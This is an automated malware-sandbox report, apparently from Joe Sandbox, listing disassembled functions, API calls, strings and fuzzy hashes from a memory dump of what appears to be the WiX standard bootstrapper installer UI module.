Instruction Fuzzy Hash: 94A1E332E01564FBCB119A60CD44AEE7B789F55764F1206A1E800FBA50DB31DE60DBD3

Function 6C9CBCB7 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

__heap_init.LIBCMT ref: 6C9CBCCB

Part of subcall function 6C9CF0B1: HeapCreate.KERNELBASE(00000000,00001000,00000000,6C9CBCD0,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CF0BA

__RTC_Initialize.LIBCMT ref: 6C9CBCEB
GetCommandLineA.KERNEL32(6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CBCF0
___crtGetEnvironmentStringsA.LIBCMT ref: 6C9CBCFB

Part of subcall function 6C9CEFCE: GetEnvironmentStringsW.KERNEL32(6C9D7D00,?,?,?,6C9CBD00), ref: 6C9CEFD8

Part of subcall function 6C9CEA05: GetStartupInfoW.KERNEL32(6C9D7DD8,6C9CBC56), ref: 6C9CEA12
Part of subcall function 6C9CEA05: __calloc_crt.LIBCMT ref: 6C9CEA1E

__ioterm.LIBCMT ref: 6C9CBD3E

Part of subcall function 6C9CEC4A: DeleteCriticalSection.KERNEL32(?,00000000,6C9D7D00,6C9CBD73,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CEC6D
Part of subcall function 6C9CEC4A: _free.LIBCMT ref: 6C9CEC86

__mtterm.LIBCMT ref: 6C9CBD0E

Part of subcall function 6C9CE1C4: DecodePointer.KERNEL32(00000008,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CE1D5
Part of subcall function 6C9CE1C4: TlsFree.KERNEL32(0000002A,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CE1EF
Part of subcall function 6C9CE1C4: DeleteCriticalSection.KERNEL32(00000000,00000000,6C9D7D00,?,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9D0FCA
Part of subcall function 6C9CE1C4: _free.LIBCMT ref: 6C9D0FCD
Part of subcall function 6C9CE1C4: DeleteCriticalSection.KERNEL32(0000002A,6C9D7D00,?,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9D0FF4

__setargv.LIBCMT ref: 6C9CBD15
__cinit.LIBCMT ref: 6C9CBD29
__ioterm.LIBCMT ref: 6C9CBD6E
__mtterm.LIBCMT ref: 6C9CBD73

Strings

-4, xrefs: 6C9CBCBE
x z/, xrefs: 6C9CBD1C

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CriticalDeleteSection$EnvironmentStrings__ioterm__mtterm_free$CommandCreateDecodeFreeHeapInfoInitializeLinePointerStartup___crt__calloc_crt__cinit__heap_init__setargv
String ID: x z/$-4
API String ID: 2850674858-1048370266
Opcode ID: 279950c441e4bb1275f3bef0bf92905887f6e8134325dfec1bfbecd5057c8ca1
Instruction ID: bfa542dc8f81ac0d521e65bb7a46c6e3ed01824e75d3a78e433375994ba47b8a
Opcode Fuzzy Hash: 279950c441e4bb1275f3bef0bf92905887f6e8134325dfec1bfbecd5057c8ca1
Instruction Fuzzy Hash: 3831FB7178CA02DAE7107BB9884168D3679EF3275DB300916D512E2F81EF20D19587F3

Function 6C9CB692 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

CompareStringW.KERNEL32(00000000,00000000,Exe,000000FF,00000000,000000FF,00000000,PackageType,00000000,00000000,Description,-00000010,00000000,DisplayName,-00000014,00000000), ref: 6C9CB7B6

Strings

Msu, xrefs: 6C9CB800
Permanent, xrefs: 6C9CB818
Msi, xrefs: 6C9CB7C8
PackageType, xrefs: 6C9CB78B
Msp, xrefs: 6C9CB7E5
Description, xrefs: 6C9CB768
/BootstrapperApplicationData/WixPackageProperties, xrefs: 6C9CB6A0
balinfo.cpp, xrefs: 6C9CB6FD
Exe, xrefs: 6C9CB7AF
DisplayInternalUI, xrefs: 6C9CB846
Vital, xrefs: 6C9CB82F
DisplayName, xrefs: 6C9CB745
Package, xrefs: 6C9CB72A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocCompareProcessString
String ID: /BootstrapperApplicationData/WixPackageProperties$Description$DisplayInternalUI$DisplayName$Exe$Msi$Msp$Msu$Package$PackageType$Permanent$Vital$balinfo.cpp
API String ID: 4260887210-2472066405
Opcode ID: 3b47884356f57d599f629a5d587e6c1c64a9a377a7b9560c38ea58adf43db326
Instruction ID: 1218d9ec72ee629195012330f0d3ee8270ab25fe4210088a986f18dda8b0ea52
Opcode Fuzzy Hash: 3b47884356f57d599f629a5d587e6c1c64a9a377a7b9560c38ea58adf43db326
Instruction Fuzzy Hash: 58616F72E00129BBDF109FA4CCC0CDDB7B9AB64224F2546A5E924B7A90D735DE50CB53

Function 6C9C843C Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 335COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9C846B
SysFreeString.OLEAUT32(?), ref: 6C9C8764
GetLastError.KERNEL32 ref: 6C9C87A9

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

Strings

thmutil.cpp, xrefs: 6C9C881C
Font|f, xrefs: 6C9C847F
Foreground, xrefs: 6C9C8633
Underline, xrefs: 6C9C85EE
Weight, xrefs: 6C9C85B4
Height, xrefs: 6C9C857A
Background, xrefs: 6C9C8675

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocErrorFreeLastProcessString_memset
String ID: Background$Font|f$Foreground$Height$Underline$Weight$thmutil.cpp
API String ID: 2616212554-3296227098
Opcode ID: ffd2cec25bbceaf1d8731b96eec15f33f29d19d87a207437658f32f52c4a4a77
Instruction ID: f7f05a958ada837fc9674f9f45513d7fe33849816d0e0377b15591af667a679f
Opcode Fuzzy Hash: ffd2cec25bbceaf1d8731b96eec15f33f29d19d87a207437658f32f52c4a4a77
Instruction Fuzzy Hash: 7CB1EB32E002289FDB10DFA4CD849DDB7B8AB14314F26067AE925FBA50D731DD448B87

Function 6C9C180F Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 172COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,6C9C4070,?), ref: 6C9C1841
GetLastError.KERNEL32(?,6C9C4070,?), ref: 6C9C1850
_wcschr.LIBCMT ref: 6C9C18BF
LocalFree.KERNEL32(?,?,6C9C4070,?), ref: 6C9C19EF

Strings

Ignoring attempt to set non-overridable variable: '%ls'., xrefs: 6C9C190F
Must specify a language., xrefs: 6C9C19CA
Ignoring unknown argument: %ls, xrefs: 6C9C1968
Failed to set variable., xrefs: 6C9C195E
Failed to copy variable value., xrefs: 6C9C19D8
WixStandardBootstrapperApplication.cpp, xrefs: 6C9C1875
Failed to copy variable name., xrefs: 6C9C19D1
Failed to copy language., xrefs: 6C9C19DF
lang, xrefs: 6C9C197B

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ArgvCommandErrorFreeLastLineLocal_wcschr
String ID: Failed to copy language.$Failed to copy variable name.$Failed to copy variable value.$Failed to set variable.$Ignoring attempt to set non-overridable variable: '%ls'.$Ignoring unknown argument: %ls$Must specify a language.$WixStandardBootstrapperApplication.cpp$lang
API String ID: 1732016493-2972249212
Opcode ID: b4a0d9546a46958ce3c26f8d14b0c4f76da2286f99508abcd27cb1ca05e54dc4
Instruction ID: 78114a79d3fa5f4d98c15e140fd927592c030624e858798bf5ac71c2f6c55c44
Opcode Fuzzy Hash: b4a0d9546a46958ce3c26f8d14b0c4f76da2286f99508abcd27cb1ca05e54dc4
Instruction Fuzzy Hash: 2E512272F04515EBDB119FD8D885AEE77B9EF16318F210269E910BBA80D730DE408B87

Function 6C9C7C6F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 6C9C7EA5
SysFreeString.OLEAUT32(00000000), ref: 6C9C7EB4

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

Strings

ImageList, xrefs: 6C9C7C87
thmutil.cpp, xrefs: 6C9C7E92
Name, xrefs: 6C9C7D16
Image|i, xrefs: 6C9C7D4B

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocDeleteFreeObjectProcessString
String ID: ImageList$Image|i$Name$thmutil.cpp
API String ID: 1688231828-1076593805
Opcode ID: ddb5ba10dd55349212b25cfe9626fbfb5354153bc9775139f4f3c3bd64de9af2
Instruction ID: fa74a64f599ee07075bf89bbf8dd49c751f7eebf404ecf1e8c531622a58a1cdc
Opcode Fuzzy Hash: ddb5ba10dd55349212b25cfe9626fbfb5354153bc9775139f4f3c3bd64de9af2
Instruction Fuzzy Hash: 04718F72E01A29EBCB118BA4CC44AEE7BB9FF44714F118164E915FB660D731DE41CBA2

Function 6C9C6BCB Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9C6BF9
GetWindowTextW.USER32(?,?,00000100), ref: 6C9C6C10
GetLastError.KERNEL32(?,?,?), ref: 6C9C6C20
SelectObject.GDI32(?,?), ref: 6C9C6C8C
SetTextColor.GDI32(?,?), ref: 6C9C6C9A
SetBkColor.GDI32(?,?), ref: 6C9C6CB2
ExtTextOutW.GDI32(?,00000000,00000000,00000006,?,?,?,00000000), ref: 6C9C6CD5
DrawFocusRect.USER32(?,?), ref: 6C9C6CE8
SetBkColor.GDI32(?,?), ref: 6C9C6CF7
SetTextColor.GDI32(?,?), ref: 6C9C6D02
SelectObject.GDI32(?,?), ref: 6C9C6D11

Strings

thmutil.cpp, xrefs: 6C9C6C53

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ColorText$ObjectSelect$DrawErrorFocusLastRectWindow_memset
String ID: thmutil.cpp
API String ID: 2069131273-2961750086
Opcode ID: 9ff55355a1e149567785bdc53975a0a3e8d82df83487a49529d87d7fd51f950b
Instruction ID: 4fec9d2c7af63c9f3926423a06fba1695b468637f84688c3f06e3d4e454afe0b
Opcode Fuzzy Hash: 9ff55355a1e149567785bdc53975a0a3e8d82df83487a49529d87d7fd51f950b
Instruction Fuzzy Hash: D241F371640709EFDB219F60CC88BAABBB5FF14304F1042A8E656A25A1D771FD94CF81

Function 6C9CAAC0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 137memorywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9CA888: FindResourceExA.KERNEL32(00000000,0000000A,?,00000000), ref: 6C9CA898
Part of subcall function 6C9CA888: GetLastError.KERNEL32(?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA8A4

GlobalAlloc.KERNEL32(00000002,?,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CAAF8
GetLastError.KERNEL32 ref: 6C9CAB07
GlobalLock.KERNEL32(00000000,00000000), ref: 6C9CAB3A
GetLastError.KERNEL32 ref: 6C9CAB46
_memmove.LIBCMT ref: 6C9CAB71
GlobalUnlock.KERNEL32(00000000), ref: 6C9CAB7A
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 6C9CAB87
GdipAlloc.GDIPLUS(00000010), ref: 6C9CAB9B
GdipCreateBitmapFromStream.GDIPLUS(?,?,00000010), ref: 6C9CABB4
GlobalFree.KERNEL32(00000000), ref: 6C9CAC28

Strings

gdiputil.cpp, xrefs: 6C9CAB29, 6C9CABD2, 6C9CABF3

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Global$ErrorLast$AllocCreateGdipStream$BitmapFindFreeFromLockResourceUnlock_memmove
String ID: gdiputil.cpp
API String ID: 3260388689-3769319569
Opcode ID: 55ea8280390efafc520e6acc4c5ff2189687d02cb6d2f187bf69162a41528d48
Instruction ID: 0959583fdc483ae7c78b398170402e04347d89fb160fe6a43cea7d6cc2fca1e7
Opcode Fuzzy Hash: 55ea8280390efafc520e6acc4c5ff2189687d02cb6d2f187bf69162a41528d48
Instruction Fuzzy Hash: 38411572B40105AFD710AFA4C884A9EBBBAEFA4304F254439E611B7640DB34DA818B53

Function 6C9CEA05 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(6C9D7DD8,6C9CBC56), ref: 6C9CEA12
__calloc_crt.LIBCMT ref: 6C9CEA1E

Part of subcall function 6C9CE6A5: Sleep.KERNEL32(00000000,?,6C9CBC56,?), ref: 6C9CE6CD

__calloc_crt.LIBCMT ref: 6C9CEABE
GetFileType.KERNEL32(74C08559,00000001,6C9CBC56), ref: 6C9CEB45

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: __calloc_crt$FileInfoSleepStartupType
String ID:
API String ID: 591920814-0
Opcode ID: aece400a584cf447f530d5b0452356cbd34e08f9b41c314081cb03c8e8fa5f6a
Instruction ID: d2fdfb2ed06561db283434eaafa6f7b5f66370a8ef606f737c251a913dab7b52
Opcode Fuzzy Hash: aece400a584cf447f530d5b0452356cbd34e08f9b41c314081cb03c8e8fa5f6a
Instruction Fuzzy Hash: 5261E4717097018FE7108F25C88A729BBB4BF66324F244768D567AB6D1D730E4458BD3

Function 6C9C5878 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 6C9C9FA8: SysAllocString.OLEAUT32(?), ref: 6C9C9FBB
Part of subcall function 6C9C9FA8: VariantInit.OLEAUT32(?), ref: 6C9C9FC7
Part of subcall function 6C9C9FA8: VariantClear.OLEAUT32(?), ref: 6C9CA03B
Part of subcall function 6C9C9FA8: SysFreeString.OLEAUT32(00000000), ref: 6C9CA046

SysFreeString.OLEAUT32(00000001), ref: 6C9C58C6
CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,yes,000000FF,00000000,Overridable,00000001,00000000,00000000,00000001), ref: 6C9C58F7
SysFreeString.OLEAUT32(00000001), ref: 6C9C5910
SysFreeString.OLEAUT32(00000001), ref: 6C9C5942

Strings

yes, xrefs: 6C9C58EA
#(loc.%s), xrefs: 6C9C58AA
Overridable, xrefs: 6C9C58D3

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$Free$Variant$AllocClearCompareInit
String ID: #(loc.%s)$Overridable$yes
API String ID: 2861138797-597988432
Opcode ID: 0ccf2c82999e19c0a4e3e6aa4486ec5849a71aae4f8093a3da8ee5b5529a86b5
Instruction ID: 50fbed2a9435b4444bd8e190c5952c916ec2f6601bc9c8333efac3cc59fdccc5
Opcode Fuzzy Hash: 0ccf2c82999e19c0a4e3e6aa4486ec5849a71aae4f8093a3da8ee5b5529a86b5
Instruction Fuzzy Hash: B221B672A00518FBCB119BA8CD448DDFAB8EBA922576146A1F415F3550E732DF40EB42

Function 6C9C16F9 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9C1713
CloseHandle.KERNEL32(?), ref: 6C9C1724

Strings

The prerequisites were already installed. The bootstrapper application will not be reloaded to prevent an infinite loop., xrefs: 6C9C1781
The prerequisites were not successfully installed, error: 0x%x. The bootstrapper application will be not reloaded., xrefs: 6C9C179F
The prerequisites scheduled a restart. The bootstrapper application will be reloaded after the computer is restarted., xrefs: 6C9C174F, 6C9C175B
The prerequisites were successfully installed. The bootstrapper application will be reloaded., xrefs: 6C9C1766
A restart is required by the prerequisites but the user delayed it. The bootstrapper application will be reloaded after the computer is restarted., xrefs: 6C9C1756

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CloseHandleObjectSingleWait
String ID: A restart is required by the prerequisites but the user delayed it. The bootstrapper application will be reloaded after the computer is restarted.$The prerequisites scheduled a restart. The bootstrapper application will be reloaded after the computer is restarted.$The prerequisites were already installed. The bootstrapper application will not be reloaded to prevent an infinite loop.$The prerequisites were not successfully installed, error: 0x%x. The bootstrapper application will be not reloaded.$The prerequisites were successfully installed. The bootstrapper application will be reloaded.
API String ID: 528846559-3443529724
Opcode ID: 3eb53f533483657fe98ac92cea33dd850888eb79429ee245257b3ae0f8c3a05e
Instruction ID: 8f4a0331238b9c4f42a99b3706fc7a53d0d9f6b1768ae8003be403c1c994462d
Opcode Fuzzy Hash: 3eb53f533483657fe98ac92cea33dd850888eb79429ee245257b3ae0f8c3a05e
Instruction Fuzzy Hash: 5A110D71705F00AFD31046689C81FA673ECD756F29F30461AE179A6940D672F5A0C76B

Function 6C9C6DC5 Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 6C9C6E1F
SelectObject.GDI32(00000000,?), ref: 6C9C6E37
StretchBlt.GDI32(00CC0020,00000000,00000000,00000001,?,?,?,?,00000001,?,00CC0020), ref: 6C9C6E64
StretchBlt.GDI32(00CC0020,00000001,00000000,?,?,?,?,?,00000001,?,00CC0020), ref: 6C9C6E89
StretchBlt.GDI32(00CC0020,?,00000000,?,?,?,?,?,00000001,?,00CC0020), ref: 6C9C6EB9
StretchBlt.GDI32(00CC0020,?,00000000,00000001,?,?,?,?,00000001,?,00CC0020), ref: 6C9C6ED9
SelectObject.GDI32(?,?), ref: 6C9C6EE1
DeleteDC.GDI32(?), ref: 6C9C6EEA

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Stretch$ObjectSelect$CompatibleCreateDelete
String ID:
API String ID: 4055300212-0
Opcode ID: be416714ce5416687bc628bdb7179818f0616b4a3aa11b4bc6967e4f04a3e1b4
Instruction ID: 4e5a5b2e38edd4c771f0978336429026128d1f39e5c11d99fef13d6f45f9d8cf
Opcode Fuzzy Hash: be416714ce5416687bc628bdb7179818f0616b4a3aa11b4bc6967e4f04a3e1b4
Instruction Fuzzy Hash: 2D412A71A00208FFEF118F95CD85FAEBBBAFF48700F204159F505AA1A1D671AA61DB50

Function 6C9C6AFF Relevance: 10.6, APIs: 7, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6C9C6B0E
CreateCompatibleDC.GDI32(?), ref: 6C9C6B35
SelectObject.GDI32(?,?), ref: 6C9C6B4F
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,00000000,?,?,00CC0020), ref: 6C9C6B8C
DrawFocusRect.USER32(?,?), ref: 6C9C6BAA
SelectObject.GDI32(?,?), ref: 6C9C6BB6
DeleteDC.GDI32(?), ref: 6C9C6BBF

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteDrawFocusLongRectStretchWindow
String ID:
API String ID: 2155554087-0
Opcode ID: 529808d1a7347121ab930a99f5e84580485b9f804e31f7b930e74fff9cefa40a
Instruction ID: 7d7b8c37e569b883fe65799da84e66da93e884574b8ba573a22f82dcb9b09adb
Opcode Fuzzy Hash: 529808d1a7347121ab930a99f5e84580485b9f804e31f7b930e74fff9cefa40a
Instruction Fuzzy Hash: 65216D71608605FFDB108FA1C984B6EBFF8FF19344F204668E946A6650D330F994CB91

Function 6C9C2440 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9C24C0

Strings

open, xrefs: 6C9C2491
Failed to format launch target variable: %ls, xrefs: 6C9C2480
Failed to get launch target variable '%ls'., xrefs: 6C9C2466
LaunchTarget, xrefs: 6C9C244E, 6C9C2453, 6C9C2465
Failed to launch target: %ls, xrefs: 6C9C24A6

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: MessagePost
String ID: Failed to format launch target variable: %ls$Failed to get launch target variable '%ls'.$Failed to launch target: %ls$LaunchTarget$open
API String ID: 410705778-3308791003
Opcode ID: cd41f241ee9330ebe42047d95204ad83be0ba15a1e9340f56702468cfc9b594f
Instruction ID: 358a31bf5017717eda41901001ab718079188cb07d4c16f052ed4abc2cfa1387
Opcode Fuzzy Hash: cd41f241ee9330ebe42047d95204ad83be0ba15a1e9340f56702468cfc9b594f
Instruction Fuzzy Hash: 4D114CB1B01908FFDF109F94DC85DDEBA7DEB65258F108976F200B1910C6359E949663

